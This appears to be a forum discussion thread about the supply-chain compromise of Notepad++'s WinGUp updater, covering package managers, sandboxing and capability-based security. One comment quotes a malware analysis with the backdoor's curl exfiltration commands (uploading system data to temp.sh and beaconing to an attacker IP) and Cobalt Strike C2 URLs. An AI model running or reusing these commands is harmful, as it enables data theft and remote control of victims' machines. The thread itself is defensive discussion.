The WinGUp updater compromise is a textbook example of why update mechanisms are such high-value targets. Attackers get code execution on machines that specifically trust the update channel.
What's concerning is the 6-month window. Supply chain attacks are difficult to detect because the malicious code runs with full user permissions from a "trusted" source. Most endpoint protection isn't designed to flag software from a legitimate publisher's update infrastructure.
For organizations, this argues for staged rollouts and network monitoring for unexpected outbound connections from common applications. For individuals, package managers with cryptographic verification at least add another barrier - though obviously not bulletproof either.
The lack of a well-known, well-designed package manager for Windows has always been a problem. Too many programs, including FOSS programs, are downloaded from suspicious-looking websites with tons of ads, and every app updates itself in a different way.
The crappy installation and update channels are often tightly integrated with the vendors' monetization strategies, so there's a huge amount of inertia.
Microsoft Store could have changed this situation, had it been better designed and better received. Unfortunately, nobody seems to use it unless they have no other choice.
WinGet looks much better, but so far it's only for developers and power users.
The Microsoft store would have needed proper vetting and support for normal desktop apps from day 1 for it to actually have been a good option. Also, not requiring the system be set up with an online account would have been helpful for adoption.
I can't say it would have guaranteed people would have liked it, just that those were needed for it to have a chance.
> Microsoft Store could have changed this situation
Don't you need to create a Microsoft account to use it? That makes sense for a store where you buy apps with money, but not for a package manager for free software like Notepad++.
P.S. I'm waiting for the day you need a registered Ubuntu account to use their snap store :(
The stupid thing is that a packaging system - MSI and later MSIX - has existed for a long time. But the tooling for it, to put things into packages, is a mess; there isn't even a single tool for Microsoft's own stuff. They really need to get onto dogfooding this stuff.
But then, in an environment dominated by corporate IT who have no real means of switching, why improve the product?
The thing is that I trust the Debian maintainers, so I use dpkg to install my software. I do not trust Microsoft, so I use the browser to install software.
If you trust Microsoft enough to run their operating system, you trust them enough to develop a package manager.
Suppose, for example, that they caught up to where Debian was 30 years ago and Windows shipped with a default list of sources for the core OS to which you could add your internal or preferred partners (e.g. Adobe in many companies). Literally millions of systems wouldn’t have been compromised because they had unpatched apps. If they’d had a curated list of responsible vendors, multiple generations of people wouldn’t have been trained that it’s normal to run installers because a web page told you so.
Why wouldn't those also become a target if they grew to be sizable?
And if they have prevention mechanisms, why can't existing supply chains be secured with similar prevention mechanisms, instead of funneling to a single package manager provider?
The supply chain for Notepad++ updates was a PHP script on a shared hosting account pointing to the URL of an executable file.
Surely someone with more resources and more sets of eyes could do better than that? AFAIK nobody has compromised Debian's APT repositories and Red Hat's RPM repositories yet.
Do you really need the entire walled garden of the store? It's not impervious, just harder to attack, but due to its scale and value it will be constantly attacked. Not a great trade.
What happened to just good old OS APIs? You could wrap the entire "secure update" process into a function call. Does Windows somehow not already have this?
The value of the store is curation: if the random scammers who put up “Totally Acrobat PDF” websites can’t get listed, it’s safer for people who aren’t security experts to trust the installer isn’t blatant malware.
The problem is that this needs strong regulation to prevent it from turning into a payola marketing scam where vendors have to pay for placement.
I'm sure updating can be done with OS APIs, though MS doesn't look like they're in any hurry to integrate even their own store with the Windows Update mechanism.
The problem is finding and installing new software. Without a well-known official repository, people end up downloading Windows apps from random websites filled with ads and five different "Download" buttons, bundled with everything from McAfee to Adobe Reader.
We should be asking how to enable adding external sources like Ubuntu PPAs (which can then be updated like the rest), not whether there should be an official repository to bootstrap the package manager in the first place. "Store" is just a typical name for such a repository, it's not mandatory.
Notepad++ is one of my favourite editors. Thanks to this attack, it is now forbidden by IT, and security compliance checks flag it if it's still installed.
This attack highlights a broader pattern: developers and users increasingly trust code they haven't personally reviewed.
Supply chain attacks work because we implicitly trust the update channel. But the same trust assumption appears in other places:
- npm/pip packages where we `npm install` without auditing
- AI-generated code that gets committed after a quick glance
- The growing "vibe coding" trend where entire features are scaffolded by AI
The Notepad++ case is almost a best-case scenario — it's a single binary from a known source. The attack surface multiplies when you consider modern dev workflows with hundreds of transitive dependencies, or projects where significant portions were AI-generated and only superficially reviewed.
Sandboxing helps, but the real issue is the gap between what code can do and what developers expect it to do. We need better tooling for understanding what we're actually running.
> increasingly trust code they haven't personally reviewed
while the problems you describe are valid, my personal experience is the complete opposite — trust is decreasing. I don't remember anyone worrying about the supply chain 15-ish years ago — Windows was where the viruses lived, and unix people were installing distros, compiling kernel modules and building tarballs without auditing anything.
Sandboxing certainly helps but it’s not a panacea: for example, Notepad++ is exactly the kind of utility people would grant access to edit system files and they would have trusted the updater, too.
I use Notepad++ as a Notepad replacement. I never understood why the network connectivity is enabled by default at all. The first thing I did was to disable it as the constant nagging interrupted my flow (VS Code would do the same thing BTW). I currently have a version from 2020 I'm very happy with.
If one day, maybe in 10 or 20 years time, I feel Notepad++ lacks something and I decide to upgrade, I will do it myself, I don't need a handy helper.
MacOS has been getting a lot of flak recently for (correct) UI reasons, but I honestly feel like they're the closest to the money with granular app permissions.
Linux people are very resistant to this, but the future is going to be sandboxed iOS style apps. Not because OS vendors want to control what apps do, but because users do. If the FOSS community continues to ignore proper security sandboxing and distribution of end user applications, then it will just end up entirely centralised in one of the big tech companies, as it already is on iOS and macOS by Apple.
Think about it from a real world perspective.

I knock on your door. You invite me to sit with you in your living room. I can't easily sneak into your bedroom. Further, my temporary access ends as soon as I leave your house.
The same should happen with apps.
When I run 'notepad dir1/file1.txt', the package should not sneakily be able to access dir2. Further, as soon as I exit the process, the permission to access dir1 should end as well.
A better example would be requiring the mailman to obtain written permission to step on your property every day. Convenience trumps maximal security for most people.
> When I run 'notepad dir1/file1.txt', the package should not sneakily be able to access dir2.
What happens if the user presses ^O, expecting a file open dialog that could navigate to other directories? Would the dialog be somehow integrated to the OS and run with higher permissions, and then notepad is given permissions to the other directory that the user selects?
Pretty sure that’s how it works on iOS. The app can only access its own sandboxed directory. If it wants anything else, it has to use a system provided file picker that provides a security scoped url for the selected file.
Because security people often don't know the balance between security and usability, and we end up with software that is crippled and annoying to use.
I think we could get a lot further if we implement proper capability based security. Meaning that the authority to perform actions follows the objects around. I think that is how we get powerful tools and freedom, but still address the security issues and actually achieve the principle of least privilege.
For FreeBSD there is capsicum, but it seems a bit inflexible to me. Would love to see more experiments on Linux and the BSDs for this.
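To make that concrete, here's a minimal Capsicum sketch (my own illustration of the FreeBSD API, not code from the thread): open the one file the program was asked to handle, shrink the descriptor's rights, then enter capability mode so nothing else can be acquired — roughly the `notepad dir1/file1.txt` confinement discussed above.

```c
/* Minimal Capsicum sketch (FreeBSD). */
#include <sys/capsicum.h>
#include <err.h>
#include <fcntl.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    if (argc != 2)
        errx(1, "usage: %s file", argv[0]);

    /* Acquire resources *before* entering capability mode. */
    int fd = open(argv[1], O_RDWR);
    if (fd < 0)
        err(1, "open %s", argv[1]);

    /* Shrink this descriptor's rights to read/write/seek only. */
    cap_rights_t rights;
    cap_rights_init(&rights, CAP_READ, CAP_WRITE, CAP_SEEK);
    if (cap_rights_limit(fd, &rights) < 0)
        err(1, "cap_rights_limit");

    /* From here on, open(), connect(), etc. fail with ECAPMODE;
     * the process can use fd and nothing else. */
    if (cap_enter() < 0)
        err(1, "cap_enter");

    char buf[4096];
    if (read(fd, buf, sizeof buf) < 0)   /* still allowed */
        err(1, "read");
    return 0;
}
```

The inflexibility complained about above is real, though: anything the program might ever need (config files, fonts, a network socket) has to be opened or delegated up front.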
FreeBSD used to have an ELF target called "CloudABI" which used Capsicum by default.
Parameters to a CloudABI program were passed in a YAML file to a launcher that acquired what was in practice the program's "entitlements"/"app permissions" as capabilities that it passed to the program when it started.
I had been thinking of a way to avoid the CloudABI launcher.
The entitlements would instead be in the binary object file, and only reference command-line parameters and system paths.
I have also thought of an elaborate scheme with local code signing to verify that only user/admin-approved entitlements get lifted to capabilities.
However, CloudABI got discontinued in favour of WebAssembly (and I got side-tracked...)
A capability model wouldn't have prevented the compromised binary from being installed, but it would totally prevent that compromised binary from being able to read or write to any specific file (or any other system resource) that Notepad++ wouldn't have ordinarily had access to.
The original model of computer security is "anything running on the machine can do and touch anything it wants to".
A slightly more advanced model, which is the default for OSes today, is to have a notion of a "user", and then you grant certain permissions to a user. For example, for something like Unix, you have the read/write/execute permissions on files that differ for each user. The security mentioned above just involves defining more such permissions than were historically provided by Unix.
But the holy grail of security models is called "capability-based security", which is above and beyond what any current popular OS provides. Rather than the current model which just involves talking about what a process can do (the verbs of the system), a capability involves talking about what a process can do an operation on (the nouns of the system). A "capability" is an unforgeable cryptographic token, managed by the OS itself (sort of like how a typical OS tracks file handles), which grants access to a certain object.
Crucially, this then allows processes to delegate tasks to other processes in a secure way. Because tokens are cryptographically unforgeable, the only way that a process could have possibly gotten the permission to operate on a resource is if it were delegated that permission by some other process. And when delegating, processes can further lock down a capability, e.g. by turning it from read/write to read-only, or they can e.g. completely give up a capability and pass ownership to the other process, etc.

https://en.wikipedia.org/wiki/Capability-based_security
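Plain POSIX already contains a small version of this delegation idea: an open file descriptor acts like a capability, and one process can hand it to another over a Unix-domain socket. Here is a minimal sketch of the sending side (my illustration, not from the thread) — the receiver gains access to exactly that one file, with whatever access mode the sender opened it with, and never learns the path:

```c
/* Sketch: delegating one open file to another process via SCM_RIGHTS. */
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>

int send_fd(int sock, int fd) {
    char dummy = '*';                       /* must send at least one byte */
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    union {
        struct cmsghdr hdr;
        char buf[CMSG_SPACE(sizeof(int))];
    } u;
    struct msghdr msg = {
        .msg_iov = &iov, .msg_iovlen = 1,
        .msg_control = u.buf, .msg_controllen = sizeof u.buf,
    };

    struct cmsghdr *c = CMSG_FIRSTHDR(&msg);
    c->cmsg_level = SOL_SOCKET;
    c->cmsg_type  = SCM_RIGHTS;             /* "here is a capability" */
    c->cmsg_len   = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(c), &fd, sizeof(int));

    return sendmsg(sock, &msg, 0) < 0 ? -1 : 0;
}
```

If the sender opened the file O_RDONLY, the receiver can only ever read it — a crude form of the "lock a capability down before delegating it" idea, minus the full unforgeability guarantees a real capability OS would give you.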
Yet we look at phones, and we see people accepting outrageous permissions for many apps: They might rely on snooping on you for ads, or anything else, and yet the apps sell, and have no problem staying in stores.
So when it's all said and done, I do not expect practical levels of actual isolation to be that great.
> Yet we look at phones, and we see people accepting outrageous permissions for many apps
The data doesn't support the suggestion that this is happening on any mass scale. When Apple made app tracking opt-in rather than opt-out in iOS 14 ("App Tracking Transparency"), 80-90% of users refused to give consent.
It does happen more when users are tricked (dare I say unlawfully defrauded?) into accepting, such as when installing Windows, when launching Edge for the first time, etc. This is why externally-imposed sandboxing is a superior model to Zuck's pinky promises.
For all its other problems, App Store review prevents a lot of this: you have to explain why your app needs entitlements A, B and C, and they will reject your update if they don't think your explanation is good enough. It's not a perfect system, but iOS applications don't actually do all that much snooping.
I assumed the primary feature of Flatpak was to make a “universal” package across all Linux platforms. The security side of things seems to be a secondary consideration. I assume that the security aspect is now a much higher priority.
Many apps require unnecessarily broad permissions with Flatpak. Unlike Android and iOS apps they weren't designed for environments with limited permissions.
The XDG portal standards being developed to provide permissions to apps (and allow users to manage them), including those installed via Flatpak, will continue to be useful if and when the sandboxing security of Flatpaks are improved. (In fact, having the frontend management part in place is kind of a prerequisite to really enforcing a lot of restrictions on apps, lest they just stop working suddenly.)
I intensely hate that a stupid application can modify .bashrc and permanently persist itself.
Sure, in theory, SELinux could prevent this. But seems like an uphill battle if my policies conflict with the distro’s. I’d also have to “absorb” their policies’ mental model first…
I tend to think things like .bashrc or .zshrc are bad ideas anyways. Not that you asked but I think the simpler solution is to have those files be owned by root and not writable by the user. You're probably not modifying them that often anyways.
> Linux people are very resistant to this, but the future is going to be sandboxed iOS style apps.
Linux people are NOT resistant to this. Atomic desktops are picking up momentum and people are screaming for it. Snaps, flatpaks, appimages, etc. are all moving in that direction.
As for plain development, sadly, the OS developers are simply ignoring the people asking. See:

https://github.com/containers/toolbox/issues/183

https://github.com/containers/toolbox/issues/348

https://github.com/containers/toolbox/issues/1470

I'll leave it up to you to speculate why.

Perhaps getting a bit of a black eye and some negative attention from the Great Orange Website(tm) can light a fire under some folks.
I'm sure that will contribute to the illusion of security, but in reality the system is thoroughly backdoored on every level from the CPU on up, and everyone knows it.
There is no such thing as computer security, in general, at this point in history.
There's a subtlety that's missing here: if your threat model doesn't include the actors who can access those backdoors, then computer security isn't so bad these days.
That subtlety is important because it explains how the backdoors have snuck in — most people feel safe because they are not targeted, so there's no hue and cry.
The backdoors snuck in because literally everyone is being targeted.
Few people ever see the impact of that themselves or understand the chain of events that brought those impacts about.
And yet, many people perceive a difference between “getting hacked” and “not getting hacked” and believe that certain precautions materially affect whether or not they end up having to deal with a hacking event.
Are they wrong? Do gradations of vulnerability exist? Is there only one threat model, “you’re already screwed and nothing matters”?
I'm sure you're right; however, there is still a distinction between the state using my device against me and unaffiliated or foreign states using my device against me or more likely simply to generate cash for themselves.
I almost feel like this should just be the default action for all applications. I don't need them to escape out of a defined root. It's almost like your documents and application are effectively locked together. You have to give permissions for an app to access data from outside of the sandbox.
Linux has this capability, of course. And it seems like MacOS prompts me a lot for "such and such application wants to access this or that". But I think it could be a lot more fine-grained, personally.
I've been arguing for this for years. There's no reason every random binary should have unfettered, invisible access to everything on my computer as if it were me.
iOS and Android both implement these security policies correctly. Why can't desktop operating systems?
The short answer is tech debt. The major mobile OSes got to build a new third party software platform from day 0 in the late 2000s, one which focused on and enforced priorities around power consumption and application sandboxing from the get-go, etc.
The most popular desktop OSes have decades of pre-existing software and APIs to support and, like a lot of old software, the debt of choices made a long time ago that are now hard/expensive to put right.
The major desktop OSes are to some degree moving in this direction now (note the ever-increasing presence of security prompts when opening "things" on macOS, etc.), but absent a clean-sheet approach abandoning all previous third party software like the mobile OSes got, this arguably can't happen easily overnight.
Mobile platforms are entirely useless to me for exactly this reason, individual islands that don't interact to make anything more generally useful. I would never use any os that worked like that, it's for toys and disposable software only imo.
Mobile platforms are far more secure than desktop computing software. I'd rather do internet banking on my phone than on my computer. You should too.
We can make operating systems where the islands can interact. It just needs to be opt in instead of opt out. A bad Notepad++ update shouldn't be able to invisibly read all of Thunderbird's stored emails, or add backdoors to projects I'm working on, or cryptolocker my documents. At least not without my say so.
I get that permission prompts are annoying. There are some ways to do the UI aspect in a better way - like have the open file dialogue box automatically pass along permissions to the opened file. But these are the minority of cases. Most programs only need access to their own stuff. Having an OS confirmation for the few applications that need to escape their island would be a much better default. Still allow all the software we use today, but block a great many of these attacks.
Both are true, and both should be allowed to exist as they serve different purposes.
Sound engineers don't use lossy formats such as MP3 when making edits in preproduction work, as it's intended for end users and would degrade quality cumulatively. In the same way, someone working on software shouldn't be required to use an end-user consumption system when they are at work.
It would be unfortunate to see the nuance missed: just because a system isn't 'new' doesn't mean it needs to be scrapped.
> In the same way someone working on software shouldn't be required to use an end-user consumption system when they are at work.
I'm worried that many software developers (including me, a lot of the time) will only enable security after exhausting all other options. So long as there's a big button labeled "Developer Mode" or "Run as Admin" which turns off all the best security features, I bet lots of software will require that to be enabled in order to work.
Apple has quite impressive frameworks for application sandboxing. Do any apps use them? Do those DAWs that sound engineers use run VST plugins in a sandbox? Or do they just dyld + call? I bet most of the time it's the latter. And look at this Notepad++ attack. The attack would have been stopped dead if the update process validated digital signatures. But no, it was too hard, so instead they got their users' computers hacked.
I'm a pragmatist. I want a useful, secure computing environment. Show me how to do that without annoying developers and I'm all in. But I worry that the only way a proper capability model would be used would be by going all in.
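On the digital-signature point above: checking an Authenticode signature on Windows is essentially one documented API call. A hedged sketch (my illustration; I'm not claiming this is how WinGUp is structured) of what an updater could do before executing a downloaded installer:

```c
/* Sketch: verify a downloaded installer's Authenticode signature
 * before running it. Returns TRUE only if the file is signed and
 * the certificate chain is trusted by this machine. */
#include <windows.h>
#include <softpub.h>
#include <wintrust.h>
#pragma comment(lib, "wintrust")

BOOL IsSignatureValid(LPCWSTR filePath) {
    WINTRUST_FILE_INFO fileInfo = { 0 };
    fileInfo.cbStruct = sizeof fileInfo;
    fileInfo.pcwszFilePath = filePath;

    WINTRUST_DATA wtd = { 0 };
    wtd.cbStruct = sizeof wtd;
    wtd.dwUIChoice = WTD_UI_NONE;               /* no dialogs */
    wtd.fdwRevocationChecks = WTD_REVOKE_WHOLECHAIN;
    wtd.dwUnionChoice = WTD_CHOICE_FILE;
    wtd.pFile = &fileInfo;
    wtd.dwStateAction = WTD_STATEACTION_VERIFY;

    GUID policy = WINTRUST_ACTION_GENERIC_VERIFY_V2;
    LONG status = WinVerifyTrust(NULL, &policy, &wtd);

    wtd.dwStateAction = WTD_STATEACTION_CLOSE;  /* release state data */
    WinVerifyTrust(NULL, &policy, &wtd);

    return status == ERROR_SUCCESS;
}
```

Note this alone only proves "signed by someone this machine trusts"; a real updater would also have to pin the expected publisher (e.g. compare the signer certificate's subject or thumbprint), or a signed-but-malicious binary would still pass.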
There is a middle ground (maybe even closer to more limited OS design principles). It is not just toys. Otherwise neither UWP on Windows, nor Flatpaks, nor Firejail would exist, nor would systemd implement containerization features.
In such a scenario, you can launch your IDE from your application manager and then only give write access to specific folders for a project. The IDE's configuration files can also be stored in isolated directories. You can still access them with your file manager software or your terminal app, which are "special" and need to be approved by you once (or for each update) as special. You may think, "How do I even share my secrets, like Git SSH keys?" Well, that's why we need services like the SSH agent or the Freedesktop secret-storage spec. Windows already has this btw, as the secret vaults. They've been there since at least Windows 7, maybe even Vista.
If a sandbox is optional then it is not really a good sandbox
Naturally, even Flatpak on Linux suffers from this, as legacy software simply doesn't have a concept of permission models, and this cannot be bolted on after the fact.
The containers are literally the "bolting on". You need to give the illusion that the software is running under a full OS, but you can actually mount the system directories as read-only.
And you still need to mount volumes and add all sorts of holes in the sandbox for applications to work correctly and/or be useful.

Try to run GIMP inside a container, for example: you'll have to give it access to your ~/Pictures or whatever for it to be useful.

Compare that to some photo editing applications on Android/iOS, which can work without having filesystem access by getting the file through the OS file picker.
running apps in a sandbox is ok, but remember to disable internet access. A text editor should not require it, and can be used to exfiltrate the text(s) you're editing.
When started, it sends a heartbeat containing system information to the attackers. This is done through the following steps:
3. Then it uploads the 1.txt file to the temp[.]sh hosting service by executing the curl.exe -F "file=@1.txt" -s https://temp.sh/upload command;

4. Next, it sends the URL to the uploaded 1.txt file by using the curl.exe --user-agent "https://temp.sh/ZMRKV/1.txt" -s http://45.76.155[.]202 command.
--
The Cobalt Strike Beacon payload is designed to communicate with the cdncheck.it[.]com C2 server. For instance, it uses the GET request URL https://45.77.31[.]210/api/update/v1 and the POST request URL https://45.77.31[.]210/api/FileUpload/submit.
--
The second shellcode, which is stored in the middle of the file, is the one that is launched when ProShow.exe is started. It decrypts a Metasploit downloader payload that retrieves a Cobalt Strike Beacon shellcode from the URL https://45.77.31[.]210/users/admin
Not what the OP is referring to, but UWP and successor apps were always sandboxed, from the time of Windows 8 onwards. This was derived from the Windows Mobile model, which in turn was emulating the Android/iOS app model.
The only way to clean up an infected Windows system is to wipe your disk and reinstall the OS.
There are so many nooks and crannies where malware can hide, and Windows doesn't enforce any boundaries that can't be crossed with a trivial UAC dialog.
I'd say it's more true on Linux that malware can hide anywhere if you allow a sudo prompt (which people have unfortunately been trained to think is normal when installing software).
Windows enforces driver signing and has a deeper access control system that means a root account doesn't even truly exist. The SYSTEM pseudo-account looks like it should be that, but you can actually set up ACLs that make files untouchable by it. In fact, if you check the files in System32, they are only writable by TrustedInstaller. A user's administrative token and SYSTEM have no access to those files.
But when it comes down to it, I wouldn't trust any system that has had malware on it. At the very least I'd do a complete reinstall. It might even be worth re-flashing the firmware of all components of the system too, but the chances of those also being infected are lower as long as signed firmware is required.
Malware can't modify files in System32, but it can drop extra files in there no problem. The only way to find and clean them up is a clean install.
In Linux, one could write a script that reinstalls all packages, cleans up anything that doesn't belong to an installed package, and asks you about files it's not sure about. It's easy to modify a Linux system, but just as easy to restore it to a known state.
Well, try again. I just managed to copy a random .exe to C:\Windows\System32 using an administrator account. I got a typical UAC dialog that most people would blindly click "Continue" on, and the copy succeeded. :)
Not to mention secure boot kernel protection, protected folders, memory protection, real time scanning, real time behavioral scanning, signature scanning, code signing. And Windows S mode protection.

The malware and supply chain attack landscape is totally different now. Linux has many more viruses than in the past. People don't actively scan because they are operating on a 1990s mindset.
I'm out of the loop: How did they bypass Notepad++'s digital signatures? I just downloaded it to double-check, and the installer is signed with a valid code-signing certificate.
It now seems to be best practice to simultaneously keep things updated (to avoid newly discovered vulnerabilities), but also not update them too much (to avoid supply chain attacks). Honestly not sure how I'm meant to action those at the same time.
In the early days, updates quite often made systems less stable, by a demonstrable margin. My dad once turned off all updates on his Windows machine, with the ensuing peril that you can imagine.
Sadly, it feels like Microsoft updates lately have trended back towards being unreliable and even user hostile. It's messed up if you update and can't boot your machine afterwards, but here we are. People are going to turn off automatic updates again.
The easiest way to action as a user seems like it would be to use local package managers that includes something like Dependabot's cooldown config. I'm not aware of any local package managers that do something like this?
You basically need to make a trade-off between 0days and supply chain attacks. Browsers, office suite, media players, archivers, and other programs that are connected to the internet and are handling complex file formats? Update regularly, or at least keep an eye out for CVEs. A text editor, or any other program that doesn't deal with risky data? You're probably fine with auto update turned off
>Using notepad++ (or whatever other program) in a manner that deals with internet content a lot - then updating is the thing.
Disagree. It's hard to screw up a text editor so much that you have buffer overflows 10 years after it's released, so it's probably safe. It's not impossible, but based on a quick search (though incomplete because google is filled with articles describing this incident) it doesn't look like there were any vulnerabilities that could be exploited by arbitrary input files. The most was some dubious vulnerability around being able to plant plugins.
Supply chain attacks have an impact on more systems, so it's more likely that your system is one of them. Opening a poisoned text file that contains an exploit that attacks your text editor and fits your version exactly is a rare event, compared to automatically contacting a server to ask for an executable to execute without asking you.
Unless there's an announcement of a zero day, update a month after each new release. Keeps you on a recent version while giving security systems and researchers time to detect threats.
Debian stable. If you need something to be on the bleeding edge install it from backports or build from source. But keep most of your system boring and stable. It has worked fine for me for years.
I don't think you understand Debian. There's a new release every 2 years. A few months before every release there's the so-called package freeze on the testing branch. Whatever version the packages are on at that point is the version they will have for the next stable release. Between releases the only updates are security updates.
Do you mean I should worry about the fixed CVEs that are announced and fixed for every other distribution at the same time? Is that the supply-chain attack you're referring to?
Naive question, but isn't this relatively safe information to expose for this level of attack? I guess the idea is to find systems vulnerable to 0-day exploits and similar based on this info? Still, that seems like a lot of effort just to get this data.
it's not "just to get that data", it's to confirm level of access, check for potential other exploiters or security software, identify the machine you have access to, identify what the machine has network connectivity to, etc. The attacker then maintains the c2 channel and can then perform their actual objective with the help of the data they have obtained.
You would be a dumbass to do that, because virustotal allows security researchers to see submitted samples/urls. The last thing you want to do is to draw attention to your C&C server.
I just checked, I'm on version 8.8.8. With the TinyWall firewall, it has no access to the internet without my explicit say so. This is why constantly trying to be on the bleeding edge of updates will more likely bite you in the ass than leaving your system/program open to attack through some unpatched vulnerability will. Look at Windows 11 updates lately. I bet most users would gladly be behind with their updates right now.
I recommend removing Notepad++ and installing it via winget, which installs the EXE directly, without the WinGUp updater service.
Here's an AI summary explaining who is affected.
Affected Versions: All versions of Notepad++ released prior to version 8.8.9 are considered potentially affected if an update was initiated during the compromise window.
Compromise Window: Between June 2025 and December 2, 2025.
Specific Risk: Users running older versions that utilized the WinGUp update tool were vulnerable to being redirected to malicious servers. These servers delivered trojanized installers containing a custom backdoor dubbed Chrysalis.
https://community.notepad-plus-plus.org/topic/27212/autoupda...

Thankfully the responses weren't outright dismissive, which is usually the case in these situations.
It was thought to be a local compromise and nothing to do with Notepad++.
Good lessons to be learned here. Don't be quick to dismiss things simply because they don't fit what you think should be happening. That's the whole point. It doesn't fit, so investigate why.
Most tech support aims to prove the person wrong right out the gate.
It's listed as the third most popular IDE after Visual Studio Code and Visual Studio by respondents to Stack Overflow's annual survey. Interestingly, it's higher among professionals than learners. Maybe that's because learners are going to be using some of those newer AI-adjacent editors, or because learners are less likely to be using Windows at all.
I'm sure people will leap to the defense of their chosen text editor, like they always do. "Oh, they separated vim and Neovim! Those are basically the same! I can combine those, really, to get a better score!" But I think a better takeaway is that it's incredible that Notepad++, an open source application exclusive to Windows that has had, basically, a single developer over the course of 22 years, has managed to reach such a widespread audience. Especially when Scintilla's other related editors (SciTE, EditPlus) essentially don't rate.
I think the argument you made for combining vim and neovim is pretty good actually. But it seems pretty unique to those two editors (well, throw vi in there if it ever shows up on the chart), so “worst” case notepad++ would be bumped down just one spot.
If vim were good enough, neovim wouldn't exist. If neovim were that much better, vim wouldn't still be as popular as it is. And if neither of them did anything worth picking up, then vi would still outrank them.
The conclusion is that they don't do the same things. They just both have the vi interface. But having a vi interface isn't particularly weird anymore. SublimeText and vscode have vi bindings. So does PyCharm/IntelliJ. So does Notepad++! Heck, so does nano! So who gets to claim those editors? Vscode is the most popular editor that supports a vi-like interface. Shouldn't that mean that vscode is the best of the "vi descendants"? Or does it mean that all these people were okay with the vi interface, but had a good reason not to make the choice they did for another editor?
Fundamentally, the issue is: Either choice matters, or popularity doesn't matter. You can't have it both ways.
>Maybe that's because learners are going to be using some of those newer AI-adjacent editors, or because learners are less likely to be using Windows at all.
You can use the 2022 (i.e. pre-ChatGPT) results to control for that. The results are basically the same.

https://survey.stackoverflow.co/2022/#most-popular-technolog...
I enjoy coding something new up in Notepad++, without any annoying autocomplete and jank. I call it unplugged (acoustic?) mode. Jeepers, Visual Studio these days starts autocompleting if and while, for example, and sometimes doesn't respect normal keystrokes because it expects me to complete those kinds of interactions instead.
I love the Notepad++ feature where, when you have documents open and exit, it won't bother you with a save dialog, and when you open it again the previous state will be there. I found that Mousepad on Linux can do this.
For something functionally close, I would look at Kate.
I love and hate it at the same time, just like my browser tab hoarding; it means I currently have 218 open documents in Notepad++ (and 96 browser tabs). I might not even need them anymore, but it's always "I'll look at them... later".
For the browser you can use something like Session Buddy. Save the session and move on, secure in the knowledge that the tabs are there IF you need them.

https://sessionbuddy.com/
At least in the past, I gave up and just used N++ with Wine. It didn't fit the rest of the system at all, but it was more usable for editing simple text files than the DE defaults of GEdit and Kate.
> Does Windows somehow not already have this?

The Store uses that behind the scenes. You don't have to use the store to use the system update system.

It's particularly good because updates can happen in the background, without having to launch your app to trigger them.
> increasingly trust code they haven't personally reviewed

This has been true since we left the era where you typed the program in each time you ran it. Ken Thompson rather famously wrote about this four decades ago: https://www.cs.umass.edu/~emery/classes/cmpsci691st/readings...
There is no reason for a tool to implicitly access my mounted cloud drive directory and browser cookie data.
Asking continuously is worse than not asking at all…
But fine, lock Windows down for normal users, as long as I can still disable all the security. We don't need another Apple.
That's what I do with my sandbox right now.
> it has to use a system provided file picker that provides a security scoped url for the selected file

There's also a similar photos picker (PHPicker) which is especially good from 2023 on. Signal uses this, for instance.
Redox is also moving towards having capabilities mapped to fd's, somewhat like Capsicum. Their recent presentation at FOSDEM: https://fosdem.org/2026/schedule/event/KSK9RB-capability-bas...
You can use the underlying sandboxing with bwrap. A good alternative is firejail. They are quite easy to use.
I prefer to centralize package management to my distro, but I value their sandboxing efforts.
Personally, I think it's time to take sandboxing seriously. Supply chain attacks keep happening. Defense in depth is the way.
Not sure how something can be called a sandbox without the actual box part. As Siri is to AI, Flatpak is to sandboxes.
My experience with android apps seems to be different. Every other app seems to be asking for contacts or calling or access to files.
> There is no such thing as computer security, in general, at this point in history.

Indeed. Why lock your car door, when anyone can unlock it and steal the car by learning lock-picking?
> Are they wrong? Do gradations of vulnerability exist? Is there only one threat model, "you're already screwed and nothing matters"?

It's still worth solving one of these problems.
Or, the easier way, use an external tool like Sandboxie: https://sandboxie-plus.com/
I'm surprised this wasn't linked from the original notepad++ disclosure
> I'm not aware of any local package managers that do something like this?

https://docs.github.com/en/code-security/reference/supply-ch...
Using notepad++ (or whatever other program) in a manner that deals with internet content a lot - then updating is the thing.
Using these tools in a trusted space (local files/network only): then don't update unless it needs to be different to do what you want.

For many people, it's something in between, because new files/network-tech come and go from the internet. So, update occasionally...
> I guess the idea is to find systems vulnerable to 0-day exploits and similar based on this info?

You don't need 0days when you already have RCE on an unsandboxed system.
Could this be the attacker? The scan happened before the hack was first exposed on the forum.
Notepad++ hijacked by state-sponsored actors
https://news.ycombinator.com/item?id=46851548
https://arstechnica.com/security/2026/02/notepad-updater-was...
This train of thought made me go find https://www.oldversion.com/. For a while, that was invaluable.
And of course “Ed is the standard text editor.”
https://www.gnu.org/fun/jokes/ed-msg.en.html